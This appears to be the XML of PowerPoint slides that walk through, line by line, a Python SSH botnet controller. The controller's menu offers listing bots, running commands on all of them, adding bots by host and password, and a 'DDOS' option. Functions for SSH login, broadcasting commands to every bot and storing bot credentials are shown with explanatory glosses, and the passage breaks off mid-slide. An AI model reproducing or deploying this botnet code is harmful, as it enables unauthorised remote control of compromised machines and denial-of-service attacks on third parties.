              <a:t>sys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module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accessing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system-specific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parameters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functions</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>import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os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Imports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</a:rPr>
              <a:t>os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module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interacting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with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operating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system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>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>import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json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Imports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</a:rPr>
              <a:t>json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module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working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with</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> JSON </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>data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>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>from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colorama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import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Fore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init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Imports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</a:rPr>
              <a:t>Fore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colored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text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output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</a:rPr>
              <a:t>init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initialize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colorama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>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>from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pexpect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import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pxssh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Imports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</a:rPr>
              <a:t>pxssh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handling</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> SSH </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>connections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>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>from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scapy.all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import</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> *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Imports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all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functions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from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Scapy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>, a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>packet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manipulation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tool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>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="uk-UA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8954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09D2C18-29F0-C59E-2F9B-28EAAEC3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56" y="226674"/>
            <a:ext cx="11958403" cy="6599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b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>init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autoreset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>True</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>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Initializes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colorama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sets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auto-reset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after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each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colored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print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err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>os.system</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>('</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>clear</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>')</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Clears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the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console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screen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="uk-UA"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>def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display_menu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>():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Defines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</a:rPr>
              <a:t>display_menu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function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print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options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menu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print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Fore.GREEN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> + "1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>List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Bots</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>")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Displays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"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>List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Bots</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>option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green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print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Fore.GREEN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> + "2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>Run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Command</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>")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Displays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"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Run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Command</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>option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green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print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Fore.GREEN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> + "3. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>Bash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>")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Displays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"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Bash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>option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green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print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Fore.GREEN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> + "4. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>Add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Bot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>")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Displays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"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Add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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>option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green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print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Fore.GREEN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> + "5. DDOS")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Displays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"DDOS" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>option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green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print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Fore.RED</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> + "6. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>Exit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>")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Displays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"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Exit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>option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red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6187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B1DDAF8-B95F-BB58-2E09-27F26ABA9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492125"/>
            <a:ext cx="10515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uk-UA" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>def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connect_ssh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host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port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user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password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>):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Defines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</a:rPr>
              <a:t>connect_ssh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function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establish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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> SSH </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>connection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/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>try</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>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Starts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try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block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handle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potential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exceptions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>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>s = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>pxssh.pxssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>()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Creates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instance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</a:rPr>
              <a:t>pxssh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s.login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host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user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password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port</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>port</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>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Attempts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log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SSH </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>server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return</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> s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Returns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SSH </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>session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object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successful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except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Exception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as</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> e: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Catches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any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exceptions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print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Fore.RED</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> + f"[!] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>Error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connecting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to</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> {</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>host</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>}")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Prints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error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message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connection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fails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print</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>(e)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Prints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exception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message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return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None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Returns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</a:rPr>
              <a:t>None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connection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fails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1056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15F17B1-D834-3D1A-5690-5245A25FA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" y="40068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b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>def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send_command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session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cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>):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Defines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</a:rPr>
              <a:t>send_command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function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send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command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SSH </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>session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session.sendline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cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>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Sends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command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session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session.prompt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>()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Waits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command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complete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return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session.before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Returns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command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output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7145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770E7EC-74E4-3D52-90B9-AF7667750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21" y="307871"/>
            <a:ext cx="11383780" cy="543812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uk-UA" b="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>def botnet_command(command):</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>: Defines the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>botnet_command</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> function to send a command to all bots.</a:t>
            </a:r>
            <a:endParaRPr lang="uk-UA"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>for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client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in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botnet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>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Iterates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through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each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botnet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if</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>session</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>in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client</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>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Checks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has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active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session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session</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>client</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>['</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>session</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>']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Retrieves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session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object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output</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>send_command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session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command</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>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Sends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command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gets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output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print</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>(f"[+] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>Output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from</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> " + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>client</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>['</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>host</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>'])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Prints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bot's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host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print</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>("&lt;&lt;&lt; " + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>output.decode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>())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Prints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command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output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else</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>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If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no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session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found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>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>print(Fore.RED + f"[!] Error: No session found for {client['host']}")</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>: Prints an error message.</a:t>
            </a:r>
            <a:endParaRPr lang="uk-UA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9232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35A3E04-08BB-DF12-5AB4-381B1145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23" y="270396"/>
            <a:ext cx="11315075" cy="565673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uk-UA" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>def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add_client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host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port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user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password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>):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Defines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</a:rPr>
              <a:t>add_client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function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add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new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session</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>connect_ssh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host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port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user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password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>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Connects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SSH </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>server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if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session</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>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Checks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connection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was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successful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client_info</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> = {'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>host</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>': </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>host</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>, '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>port</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>': </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>port</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>, '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>': </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>, '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>': </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>, '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>session</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>': </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>session</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>}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Creates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dictionary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with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bot's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details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botnet.append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client_info</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>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Adds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botnet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list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print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Fore.GREEN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> + "[+] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>Bot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added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successfully</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>.")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Prints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success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message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>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>else:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>: If the connection failed.</a:t>
            </a:r>
            <a:endParaRPr lang="uk-UA"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>print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Fore.RED</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> + "[!] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>Failed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to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add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bot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:r>
